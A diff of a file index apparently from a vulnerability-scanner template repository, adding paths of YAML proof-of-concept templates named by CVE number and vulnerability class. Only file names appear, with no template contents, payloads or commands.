./poc/cve/CVE-2021-39321-0cc8142562329f37716ddb940ba42762.yaml ./poc/cve/CVE-2021-39321.yaml ./poc/cve/CVE-2021-39322-262084dbc8e5d4ed4776882955e89dac.yaml +./poc/cve/CVE-2021-39322-6337.yaml ./poc/cve/CVE-2021-39322.yaml ./poc/cve/CVE-2021-39325-30b86d7c5be08dc63d78d6a517f9a0b6.yaml ./poc/cve/CVE-2021-39325.yaml @@ -18769,6 +18794,7 @@ ./poc/cve/CVE-2021-39348.yaml ./poc/cve/CVE-2021-39349-93c27325ad454645effed2b93bf31844.yaml ./poc/cve/CVE-2021-39349.yaml +./poc/cve/CVE-2021-39350-6343.yaml ./poc/cve/CVE-2021-39350-6d840ee8465c162760141f4421d24ddb.yaml ./poc/cve/CVE-2021-39350.yaml ./poc/cve/CVE-2021-39351-fab896b2fd7f778308c1968bc77302dc.yaml @@ -19331,6 +19357,7 @@ ./poc/cve/CVE-2022-0267-bd70bec706ed7913a29e57297694ed67.yaml ./poc/cve/CVE-2022-0267.yaml ./poc/cve/CVE-2022-0271-6616.yaml +./poc/cve/CVE-2022-0271-6617.yaml ./poc/cve/CVE-2022-0271-d08b1378bcd998d9987a5e5ed83be506.yaml ./poc/cve/CVE-2022-0271.yaml ./poc/cve/CVE-2022-0279-37686b2be5567f3867bb0a6d87d8ed72.yaml @@ -19338,6 +19365,7 @@ ./poc/cve/CVE-2022-0281.yaml ./poc/cve/CVE-2022-0287-1e296fa5f0743d9aa817892ba78f13b2.yaml ./poc/cve/CVE-2022-0287.yaml +./poc/cve/CVE-2022-0288(1).yaml ./poc/cve/CVE-2022-0288-35b3514a601443f618a7d79da617b48f.yaml ./poc/cve/CVE-2022-0288.yaml ./poc/cve/CVE-2022-0313-de1d5c6484a4f8052ca4eb03a7ad7a02.yaml @@ -25269,6 +25297,7 @@ ./poc/cve/CVE-2023-2298-9520971b55bc1d3e71e812d50052d4d7.yaml ./poc/cve/CVE-2023-2298.yaml ./poc/cve/CVE-2023-2299-7e695e81d10dd05b794b692772ca0bb3.yaml +./poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml ./poc/cve/CVE-2023-2299.yaml ./poc/cve/CVE-2023-2300-fe70e1f10d5d5592278d928cf380a6ed.yaml ./poc/cve/CVE-2023-2300.yaml @@ -25794,6 +25823,7 @@ ./poc/cve/CVE-2023-2407-99b7693ca225acd68f2de34853ba5b24.yaml ./poc/cve/CVE-2023-2407.yaml ./poc/cve/CVE-2023-24100.yaml +./poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml ./poc/cve/CVE-2023-2414-a38fe00c1282a17b2bcb11ff01d32782.yaml ./poc/cve/CVE-2023-2414.yaml ./poc/cve/CVE-2023-2415-5de376ba13565bd67530c98131e13dd3.yaml @@ -33415,6 +33445,7 @@ ./poc/cve/CVE-2023-7295.yaml ./poc/cve/CVE-2023-7296-527f2663670d5ab77193c7bfd28b2b4c.yaml ./poc/cve/CVE-2023-7296.yaml +./poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml ./poc/cve/CVE-2023–24044.yaml ./poc/cve/CVE-2024-0012.yaml ./poc/cve/CVE-2024-0015.yaml @@ -33990,6 +34021,7 @@ ./poc/cve/CVE-2024-10112-b49134293bd607a2527227eff1da1897.yaml ./poc/cve/CVE-2024-10112.yaml ./poc/cve/CVE-2024-10113-207a84535abc345595ed49fce69e674b.yaml +./poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml ./poc/cve/CVE-2024-10113.yaml ./poc/cve/CVE-2024-10114-6564102a019f9d71ebb84293fc9159f1.yaml ./poc/cve/CVE-2024-10114.yaml @@ -34070,6 +34102,7 @@ ./poc/cve/CVE-2024-10285.yaml ./poc/cve/CVE-2024-10294-1131fa6d3c45d258c35e83876ed4fab3.yaml ./poc/cve/CVE-2024-10294.yaml +./poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml ./poc/cve/CVE-2024-10310-08ea151b2594c4d66f1066377ac5bb02.yaml ./poc/cve/CVE-2024-10310.yaml ./poc/cve/CVE-2024-10311-ad9b2bf71e997bc9d43308ae128f5343.yaml @@ -34199,6 +34232,7 @@ ./poc/cve/CVE-2024-1054.yaml ./poc/cve/CVE-2024-10540-c51c8b8ffe37ad945de4a85718f3c6a4.yaml ./poc/cve/CVE-2024-10540.yaml +./poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml ./poc/cve/CVE-2024-10543-e240462908e52198328b07cf1527032a.yaml ./poc/cve/CVE-2024-10543.yaml ./poc/cve/CVE-2024-10544-09e7902ad0b8f33d5cc3104966bee93f.yaml @@ -34213,11 +34247,13 @@ ./poc/cve/CVE-2024-1056.yaml ./poc/cve/CVE-2024-1057-7965d17e1316abe215e22b7e9f9e3d34.yaml ./poc/cve/CVE-2024-1057.yaml +./poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml ./poc/cve/CVE-2024-10571-65e9c11a23f73f8d4720a8ea4b5d4a90.yaml ./poc/cve/CVE-2024-10571.yaml ./poc/cve/CVE-2024-10577-03e59e27ad2ae9ca6f8945bd8581720d.yaml ./poc/cve/CVE-2024-10577-c910dfbedc2df85177b53310160d01a7.yaml ./poc/cve/CVE-2024-10577.yaml +./poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml ./poc/cve/CVE-2024-1058-ee29f13d5975fd520360e5ea7be92c39.yaml ./poc/cve/CVE-2024-1058.yaml ./poc/cve/CVE-2024-10582-7704c1d06076c134a57bf5d19cc06da6.yaml @@ -34251,6 +34287,8 @@ ./poc/cve/CVE-2024-10629-332d4937160a02ac721cbe2b6338d39c.yaml ./poc/cve/CVE-2024-10629-9071ce95c18df27f4320ef93029b5e1c.yaml ./poc/cve/CVE-2024-10629.yaml +./poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml +./poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml ./poc/cve/CVE-2024-10640-88364cdc0e1cf13f113175b2a7c50048.yaml ./poc/cve/CVE-2024-10640.yaml ./poc/cve/CVE-2024-10645-12fb06a8e024b16633ddff06befd81c1.yaml @@ -34277,6 +34315,7 @@ ./poc/cve/CVE-2024-10675.yaml ./poc/cve/CVE-2024-10676-2bafa63d26dbb721ca2c3269f52d08aa.yaml ./poc/cve/CVE-2024-10676.yaml +./poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml ./poc/cve/CVE-2024-1068-9cafdd7123cc13ec1ddd7f5534904f5e.yaml ./poc/cve/CVE-2024-1068.yaml ./poc/cve/CVE-2024-10682-845790654070752f55040438702d276d.yaml @@ -34323,6 +34362,7 @@ ./poc/cve/CVE-2024-10726.yaml ./poc/cve/CVE-2024-10728-5367c0115b9f0dd84cd056683961ff32.yaml ./poc/cve/CVE-2024-10728.yaml +./poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml ./poc/cve/CVE-2024-1073-fbc0c1c17165bd449a27005cce0363e5.yaml ./poc/cve/CVE-2024-1073.yaml ./poc/cve/CVE-2024-1074-4c296a05497d5bc129c7aee7ddf3b5dd.yaml @@ -34340,6 +34380,7 @@ ./poc/cve/CVE-2024-10779.yaml ./poc/cve/CVE-2024-1078-39f90c2cfcf5b03de5f108a21d5273bb.yaml ./poc/cve/CVE-2024-1078.yaml +./poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml ./poc/cve/CVE-2024-10782-871d48d03543e0a74eec4ebf111104a8.yaml ./poc/cve/CVE-2024-10782.yaml ./poc/cve/CVE-2024-10785-752c3d56038fb0ae320f03c3f333b1cb.yaml @@ -34374,6 +34415,7 @@ ./poc/cve/CVE-2024-10803.yaml ./poc/cve/CVE-2024-1081-417d6d8bd1123c156873fbb60bca6fb8.yaml ./poc/cve/CVE-2024-1081.yaml +./poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml ./poc/cve/CVE-2024-10813-a08e82184ce8ed05fea7d993edf31c4f.yaml ./poc/cve/CVE-2024-10813.yaml ./poc/cve/CVE-2024-10814-58a03019f7199f16ebf4bd1bc27b3541.yaml @@ -34404,8 +34446,10 @@ ./poc/cve/CVE-2024-10854.yaml ./poc/cve/CVE-2024-10855-9797a05382d738af944c2b6cf2c145bc.yaml ./poc/cve/CVE-2024-10855.yaml +./poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml ./poc/cve/CVE-2024-10861-c40986779716526ccd0ee5dd3bc07cbf.yaml ./poc/cve/CVE-2024-10861.yaml +./poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml ./poc/cve/CVE-2024-10868-8b61cc0ce6d8b3316c7c2c5040692b8a.yaml ./poc/cve/CVE-2024-10868.yaml ./poc/cve/CVE-2024-10869-69d63f7e251aa82fc4784a3197687316.yaml @@ -34477,8 +34521,11 @@ ./poc/cve/CVE-2024-10961.yaml ./poc/cve/CVE-2024-10962-b5d6c73fa07a42d3299578c2a0d3f408.yaml ./poc/cve/CVE-2024-10962.yaml +./poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml +./poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml ./poc/cve/CVE-2024-11028-be11a59cf40f1f75ac81807f970e31ef.yaml ./poc/cve/CVE-2024-11028.yaml +./poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml ./poc/cve/CVE-2024-11034-e1e9a5b783c2c14bb4a6bb1a32d87b5b.yaml ./poc/cve/CVE-2024-11034.yaml ./poc/cve/CVE-2024-11036-6d67cff59a0bdc2ab8040040c798d716.yaml @@ -34499,6 +34546,7 @@ ./poc/cve/CVE-2024-11089.yaml ./poc/cve/CVE-2024-1109-4c10e88fb81ea15210121c0e65900bb8.yaml ./poc/cve/CVE-2024-1109.yaml +./poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml ./poc/cve/CVE-2024-11092-082481fd8094c2aeb1f67893a9a2bde4.yaml ./poc/cve/CVE-2024-11092.yaml ./poc/cve/CVE-2024-11094-16bcde675cb0d64a03b0f91cfb9ac467.yaml @@ -34511,6 +34559,7 @@ ./poc/cve/CVE-2024-11104.yaml ./poc/cve/CVE-2024-11118-e75c108a13b6a2366005bdd8aa42aa89.yaml ./poc/cve/CVE-2024-11118.yaml +./poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml ./poc/cve/CVE-2024-1112.yaml ./poc/cve/CVE-2024-11143-c1f2d03748f173b3fd4ffd310317801b.yaml ./poc/cve/CVE-2024-11143.yaml @@ -34526,6 +34575,7 @@ ./poc/cve/CVE-2024-11188.yaml ./poc/cve/CVE-2024-1119-f409952ee3d6dca89fd2240564c4bf88.yaml ./poc/cve/CVE-2024-1119.yaml +./poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml ./poc/cve/CVE-2024-11194-fef16dd85f2f17cbac8618d7471c25a5.yaml ./poc/cve/CVE-2024-11194.yaml ./poc/cve/CVE-2024-11195-c691007e253c4054d9b611e5bdf99fc3.yaml @@ -34539,6 +34589,13 @@ ./poc/cve/CVE-2024-1120-13d5e470e7a35527e5bda6d36f1caf1b.yaml ./poc/cve/CVE-2024-1120-f445687130ddcdec55eaa4fd370ff0a2.yaml ./poc/cve/CVE-2024-1120.yaml +./poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml +./poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml +./poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml +./poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml +./poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml +./poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml +./poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml ./poc/cve/CVE-2024-1121-f9acdd7e5d4400d7ac2f5c1f64969230.yaml ./poc/cve/CVE-2024-1121.yaml ./poc/cve/CVE-2024-1122-5f1c2e67352badc3464a23f2df4684bd.yaml @@ -34546,6 +34603,7 @@ ./poc/cve/CVE-2024-11224-00fc21f7e5858419f5ee0911bc9c6261.yaml ./poc/cve/CVE-2024-11224.yaml ./poc/cve/CVE-2024-11225-4d2d005fcdf5576ec7648d7b60c4ad7d.yaml +./poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml ./poc/cve/CVE-2024-11225.yaml ./poc/cve/CVE-2024-11227-57eaabcac1ab84d3ade4104df773bafb.yaml ./poc/cve/CVE-2024-11227.yaml @@ -34588,6 +34646,7 @@ ./poc/cve/CVE-2024-11334.yaml ./poc/cve/CVE-2024-1134-80f4a43eaea90aa0c6452abac73a271e.yaml ./poc/cve/CVE-2024-1134.yaml +./poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml ./poc/cve/CVE-2024-11354-0e62ca18f9bdb0611f368a7276263f85.yaml ./poc/cve/CVE-2024-11354.yaml ./poc/cve/CVE-2024-11355-edf82e64900042596ef0c5f92c74100e.yaml @@ -34630,7 +34689,9 @@ ./poc/cve/CVE-2024-11415-2c88aa7fe4ace40219306434790285d5.yaml ./poc/cve/CVE-2024-11415.yaml ./poc/cve/CVE-2024-11416-5099c1382262f4c1ae7b1e18b601dc1a.yaml +./poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml ./poc/cve/CVE-2024-11416.yaml +./poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml ./poc/cve/CVE-2024-11424-1220902dc85195463b8e6b1e1cc1470c.yaml ./poc/cve/CVE-2024-11424.yaml ./poc/cve/CVE-2024-11426-ada6fe273d3c0447cca6a4f9c17bc628.yaml @@ -35728,6 +35789,7 @@ ./poc/cve/CVE-2024-22135.yaml ./poc/cve/CVE-2024-22136-34a690f9392d853c3fefe8bfbd6bf200.yaml ./poc/cve/CVE-2024-22136.yaml +./poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml ./poc/cve/CVE-2024-22137-b59443351612e5a86361c1f8a8769449.yaml ./poc/cve/CVE-2024-22137.yaml ./poc/cve/CVE-2024-22138-acdebb06373058f049952bf1613d6c83.yaml @@ -40901,6 +40963,7 @@ ./poc/cve/CVE-2024-38722.yaml ./poc/cve/CVE-2024-38723-659674f0b82a6c7f5d9b3bd3ac53d27b.yaml ./poc/cve/CVE-2024-38723.yaml +./poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml ./poc/cve/CVE-2024-38724-657df870da9628bf255b26a03e87a25d.yaml ./poc/cve/CVE-2024-38724.yaml ./poc/cve/CVE-2024-38725-b9cf1c834ec7a1a3c0c10c34370d8bfa.yaml @@ -42944,7 +43007,9 @@ ./poc/cve/CVE-2024-47637-b86463f0dc2765a4d996011a29e96b9e.yaml ./poc/cve/CVE-2024-47637.yaml ./poc/cve/CVE-2024-47638-cc703dd87e979196c049d6684cd43aff.yaml +./poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml ./poc/cve/CVE-2024-47638.yaml +./poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml ./poc/cve/CVE-2024-47639-cb8110e222e2ba75bd6c450a0e187b23.yaml ./poc/cve/CVE-2024-47639.yaml ./poc/cve/CVE-2024-47640-3da6409578040f0987b44e63a183a809.yaml @@ -44663,6 +44728,7 @@ ./poc/cve/CVE-2024-52376-95ed2a4de1025612b3976e632e2fca33.yaml ./poc/cve/CVE-2024-52376.yaml ./poc/cve/CVE-2024-52377-3267eb46be450012fd8cbdb85f9417fe.yaml +./poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml ./poc/cve/CVE-2024-52377.yaml ./poc/cve/CVE-2024-52378-56638acd103616d3962f2ee8fb33b4cd.yaml ./poc/cve/CVE-2024-52378.yaml @@ -46356,6 +46422,7 @@ ./poc/cve/CVE-2024-8199.yaml ./poc/cve/CVE-2024-8200-212df01da660270f0a3ccabafd9f05f2.yaml ./poc/cve/CVE-2024-8200.yaml +./poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml ./poc/cve/CVE-2024-8239-c543313e973d5f22b67352b487c06362.yaml ./poc/cve/CVE-2024-8239.yaml ./poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml @@ -46750,6 +46817,7 @@ ./poc/cve/CVE-2024-8873.yaml ./poc/cve/CVE-2024-8874-2a8e27d6f0e26d25ec49d466f4379612.yaml ./poc/cve/CVE-2024-8874.yaml +./poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml ./poc/cve/CVE-2024-8902-973a09e850f27d16cf400f1ff83278bd.yaml ./poc/cve/CVE-2024-8902.yaml ./poc/cve/CVE-2024-8910-a21139e5574bbe79da0b0184ae2f61a0.yaml @@ -46907,6 +46975,7 @@ ./poc/cve/CVE-2024-9165.yaml ./poc/cve/CVE-2024-9169-f28b64870e010b6c9a9192d27b27621e.yaml ./poc/cve/CVE-2024-9169.yaml +./poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml ./poc/cve/CVE-2024-9172-dd6c762e4dc7b5869543b2ed92be27e1.yaml ./poc/cve/CVE-2024-9172.yaml ./poc/cve/CVE-2024-9173-501c69266ea14749b8cc252f701ff522.yaml @@ -47021,6 +47090,7 @@ ./poc/cve/CVE-2024-9305.yaml ./poc/cve/CVE-2024-9306-7ba53590edffd095e67bc17955e3e15f.yaml ./poc/cve/CVE-2024-9306.yaml +./poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml ./poc/cve/CVE-2024-9307-f97e0d22f048961712c6b4369a193dce.yaml ./poc/cve/CVE-2024-9307.yaml ./poc/cve/CVE-2024-9314-a0c0949919b0d8bc3642420176eab1de.yaml @@ -47128,6 +47198,7 @@ ./poc/cve/CVE-2024-9456.yaml ./poc/cve/CVE-2024-9457-72dd9bc9875b76de9e691aa9064bfa77.yaml ./poc/cve/CVE-2024-9457.yaml +./poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml ./poc/cve/CVE-2024-9462-997ea01500055b7e00f4aeed22a63b86.yaml ./poc/cve/CVE-2024-9462.yaml ./poc/cve/CVE-2024-9465.yaml @@ -47139,6 +47210,7 @@ ./poc/cve/CVE-2024-9488.yaml ./poc/cve/CVE-2024-9501-75b9d56a40fe1396bb3b9ef1c7d11ff3.yaml ./poc/cve/CVE-2024-9501.yaml +./poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml ./poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml ./poc/cve/CVE-2024-9505.yaml ./poc/cve/CVE-2024-9507-698602582a898ef6e8ecf4cbadd940fc.yaml @@ -47231,6 +47303,7 @@ ./poc/cve/CVE-2024-9613-34d52f215d262d91ee2a7e025d6f5179.yaml ./poc/cve/CVE-2024-9613-749d376baf8bd777cc22e9c75fddf8e1.yaml ./poc/cve/CVE-2024-9613.yaml +./poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml ./poc/cve/CVE-2024-9614-5bab5ff3c4c38aa538cc740404fdd268.yaml ./poc/cve/CVE-2024-9614.yaml ./poc/cve/CVE-2024-9615-442a8d84d3d89fa599dc90faa1dcc085.yaml @@ -47444,6 +47517,7 @@ ./poc/cve/CVE-2024-9967-588327a449d255859025a57006363402.yaml ./poc/cve/CVE-2024-9967.yaml ./poc/cve/CVE-2024-9988-25263bb386e109309253b43397232744.yaml +./poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml ./poc/cve/CVE-2024-9988.yaml ./poc/cve/CVE-2024-9989-3fc6b24254bebade10a4f6f48d55a380.yaml ./poc/cve/CVE-2024-9989-85df1547f857517fd16293331bfb8543.yaml @@ -61433,6 +61507,7 @@ ./poc/header/cl-body-with-header.yaml ./poc/header/cl-body-without-header.yaml ./poc/header/clockwork-php-header.yaml +./poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/header/custom-header-images-7ee9693683b9e6a4f313fa708316db95.yaml ./poc/header/custom-header-images.yaml ./poc/header/display-via-header-7015.yaml @@ -61855,6 +61930,7 @@ ./poc/ibm/ibmqradarssrf-220331-222931.yaml ./poc/injection/74cms-Template-Injection-rce.yaml ./poc/injection/74cms-v3-Boolean-injection.yaml +./poc/injection/Command Injection.yaml ./poc/injection/GLPI-9.3.3-SQL-Injection.yaml ./poc/injection/Header-Injection.yaml ./poc/injection/PHP - Command injection.yaml @@ -63565,6 +63641,7 @@ ./poc/local_file_inclusion/geovision-geowebserver-lfi-7597.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi-xss.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi.yaml +./poc/local_file_inclusion/geowebserver-lfi-xss.yaml ./poc/local_file_inclusion/glassfish-cve-2017-1000028-lfi.yaml ./poc/local_file_inclusion/glassfish-cve-2017-1000028-lfi.yml ./poc/local_file_inclusion/global-domains-lfi-7714.yaml @@ -81599,6 +81676,7 @@ ./poc/other/appointments.yaml ./poc/other/appointmind-09668263722b04d1768b724964ea3a78.yaml ./poc/other/appointmind.yaml +./poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml ./poc/other/apppresser-0d39571fcc6ff35900e0cc5116b3a739.yaml ./poc/other/apppresser-18e0253d8b89b2d1babd703baa6feb93.yaml ./poc/other/apppresser-386c9f5c1ed425e828aaa5c5f20c5994.yaml @@ -83273,6 +83351,7 @@ ./poc/other/bluepacific-network-monitoring-system.yaml ./poc/other/bluepacific-share-content-management-system.yaml ./poc/other/bluequartz.yaml +./poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml ./poc/other/bmc-discovery-panel.yaml ./poc/other/bmi-adultkid-calculator-96ecc70fc0bda6727e6c2b648dfca9ac.yaml ./poc/other/bmi-adultkid-calculator.yaml @@ -83391,6 +83470,7 @@ ./poc/other/booking-calendar-9c2e41ba06cd413d23ad4f23cb5b179d.yaml ./poc/other/booking-calendar-ab424c39e49817e4bacde002edf8f7ab.yaml ./poc/other/booking-calendar-b1f8bd0364cb10220e31fb1442623206.yaml +./poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml ./poc/other/booking-calendar-contact-form-07501663c3f7391e008694dfedd45ffb.yaml ./poc/other/booking-calendar-contact-form-20c5add8fc3bbed4d9c62ed715734952.yaml ./poc/other/booking-calendar-contact-form-55f90ef4a4122034b941f6abf0cf8cc1.yaml @@ -85380,6 +85460,7 @@ ./poc/other/cleantalk-spam-protect-9acd5e3283aab4c8de397d5884320efe.yaml ./poc/other/cleantalk-spam-protect-9ce4c8cb08148b7c233fcd0866b178c8.yaml ./poc/other/cleantalk-spam-protect-a47f30d156405819f9ae4830cdf44da6.yaml +./poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml ./poc/other/cleantalk-spam-protect-c6ce0e53b47caf48b1f6a4d49c641b09.yaml ./poc/other/cleantalk-spam-protect-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/cleantalk-spam-protect-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -89513,6 +89594,7 @@ ./poc/other/elementor-25a90f5f19fbffdd62205bd284878589.yaml ./poc/other/elementor-28951e2c7c7e3863067865ae74f6f34e.yaml ./poc/other/elementor-2b29a94bb0636efa54fd518693aafbdf.yaml +./poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml ./poc/other/elementor-30bed69a3066a11bde1e59215e3cd5b4.yaml ./poc/other/elementor-32f0ca887f580098243f40cf3ab99a89.yaml ./poc/other/elementor-404bc74d32cb335460b4bb18ffb6189d.yaml @@ -94919,6 +95001,7 @@ ./poc/other/inoerp.yaml ./poc/other/inpost-gallery-05923d53a56de919b30b40eead2d4f0d.yaml ./poc/other/inpost-gallery-1cc1cf9dc34095b462a7b36e1a07f468.yaml +./poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml ./poc/other/inpost-gallery-30a8eed5c8ace9ae3ebf27a2b3d3c48f.yaml ./poc/other/inpost-gallery-39660b2f4aa12b92e724e426fad6858f.yaml ./poc/other/inpost-gallery-5c919e6a8d1a84a5c638c910a2146351.yaml @@ -95431,6 +95514,8 @@ ./poc/other/jeg-elementor-kit-063de975442816899ef155fb809079f2.yaml ./poc/other/jeg-elementor-kit-4cf0787c619900a280b89198c79cf014.yaml ./poc/other/jeg-elementor-kit-5f025932a34c24ebbc4f3682c9fd0dd0.yaml +./poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml +./poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml ./poc/other/jeg-elementor-kit-890e5d7bb2d815b66d00fc359ad7802a.yaml ./poc/other/jeg-elementor-kit-bf68c9e5b4940e0fffb1c7b9d8a2bb12.yaml ./poc/other/jeg-elementor-kit-cf9577e1035d13408577f5b75c148fdd.yaml @@ -105286,6 +105371,7 @@ ./poc/other/security-antivirus-firewall.yaml ./poc/other/security-intelligent-management-platform.yaml ./poc/other/security-malware-firewall-45c526c3982a209b165f42c75f6d6d27.yaml +./poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml ./poc/other/security-malware-firewall-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/security-malware-firewall-dd7677218d06062b63b3b9c9bd4421bc.yaml ./poc/other/security-malware-firewall-decb939cf215a64a558e595514dc78a2.yaml @@ -106735,6 +106821,7 @@ ./poc/other/skt-blocks.yaml ./poc/other/skt-builder-4bd16f8f24d2e7611b44c8722a5fa5fe.yaml ./poc/other/skt-builder.yaml +./poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml ./poc/other/skt-skill-bar-2a90fea13e740436d6a27da4e1f30a54.yaml ./poc/other/skt-skill-bar.yaml ./poc/other/skt-templates-6ea51ea0d3a1d93e2c17e97220b99e93.yaml @@ -108190,6 +108277,7 @@ ./poc/other/support-genix-lite-64c576dc3e88ee994a3bf9f765a979d3.yaml ./poc/other/support-genix-lite.yaml ./poc/other/support-incident-tracker.yaml +./poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml ./poc/other/support-svg-87618674bc040c3728ffe4d418498d28.yaml ./poc/other/support-svg.yaml ./poc/other/supportboard-22d7d8b56e3f5cc2f25795cfd9f22c6c.yaml @@ -115186,6 +115274,7 @@ ./poc/remote_code_execution/addify-price-calculator-for-woocommerce-4a7e8b5b59d549e72ea5394d21cd6f96.yaml ./poc/remote_code_execution/addify-price-calculator-for-woocommerce.yaml ./poc/remote_code_execution/additional-order-filters-for-woocommerce-1fad26bd045c94518bdeba69fabc119c.yaml +./poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml ./poc/remote_code_execution/additional-order-filters-for-woocommerce.yaml ./poc/remote_code_execution/additional-product-fields-for-woocommerce-40af5cb517ce82bb3113102e2280db01.yaml ./poc/remote_code_execution/additional-product-fields-for-woocommerce-783267b19d4547eb98d4ac23fab700fb.yaml @@ -116749,6 +116838,7 @@ ./poc/remote_code_execution/product-gtin-ean-upc-isbn-for-woocommerce.yaml ./poc/remote_code_execution/product-input-fields-for-woocommerce-97004c16a7bb5fede3689ed987325810.yaml ./poc/remote_code_execution/product-input-fields-for-woocommerce-9a3ca09635424f94d3861e1ff9bab7e9.yaml +./poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml ./poc/remote_code_execution/product-input-fields-for-woocommerce-c97944407bd399f70cfb424f4d5a0a32.yaml ./poc/remote_code_execution/product-input-fields-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/product-input-fields-for-woocommerce-file-download.yaml @@ -117560,6 +117650,7 @@ ./poc/remote_code_execution/woocommerce-beta-tester-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woocommerce-beta-tester-plugin.yaml ./poc/remote_code_execution/woocommerce-beta-tester.yaml +./poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml ./poc/remote_code_execution/woocommerce-bookings-8ea2499a6f5cac64a1ee962d3c11f8fd.yaml ./poc/remote_code_execution/woocommerce-bookings-a9ad7d62c09b1ba0f7e4148da69bef80.yaml ./poc/remote_code_execution/woocommerce-bookings.yaml @@ -117868,6 +117959,7 @@ ./poc/remote_code_execution/woocommerce-jetpack-d3c852a02fbabb5028922424c36af155.yaml ./poc/remote_code_execution/woocommerce-jetpack-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woocommerce-jetpack-dcde8d28625b23d0598d82d5cf5c9367.yaml +./poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml ./poc/remote_code_execution/woocommerce-jetpack-e1e008ce426037ef5ae9f77edcfc6e76.yaml ./poc/remote_code_execution/woocommerce-jetpack-e2078f39da5666867ea338a19fbe40bc.yaml ./poc/remote_code_execution/woocommerce-jetpack-ea912b7f6b12b03a6471e740a2d44a8d.yaml @@ -119039,6 +119131,7 @@ ./poc/search/buddypress-global-search.yaml ./poc/search/cardoza-ajax-search-3fee688b9283108b8ce285eedf2ca99f.yaml 